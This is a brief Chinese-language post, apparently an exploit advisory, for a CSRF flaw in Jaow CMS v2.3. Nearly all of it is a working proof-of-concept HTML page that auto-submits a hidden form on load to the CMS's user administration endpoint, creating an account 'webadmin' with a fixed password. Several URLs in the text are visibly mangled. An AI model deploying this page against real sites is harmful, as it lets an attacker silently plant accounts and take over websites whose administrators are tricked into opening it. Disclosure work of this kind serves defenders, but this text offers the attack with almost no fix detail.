标题: Jaow CMS v2.3 CSRF Vulnerability 作者: DaOne [LCA] 下载地址: http://HdhCmsTestjaow.net 或者: http://scripts.toocharger测试数据/fiches/scripts/jaow/5370.htm [#] [ CSRF增加账号] <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://[ HdhCmsTest2cto测试数据 ]/administration/utilisateur.php"> <input type="hidden" name="Nom" value="webadmin"/> <input type="hidden" name="Prenom" value="webadmin"/> <input type="hidden" name="Pseudo" value="webadmin"/> <input type="hidden" name="Mdp" value="pass123"/> </form> </body> </ html >
查看更多关于Jaow CMS v2.3 CSRF缺陷及修复 - 网站安全 - 自学php的详细内容...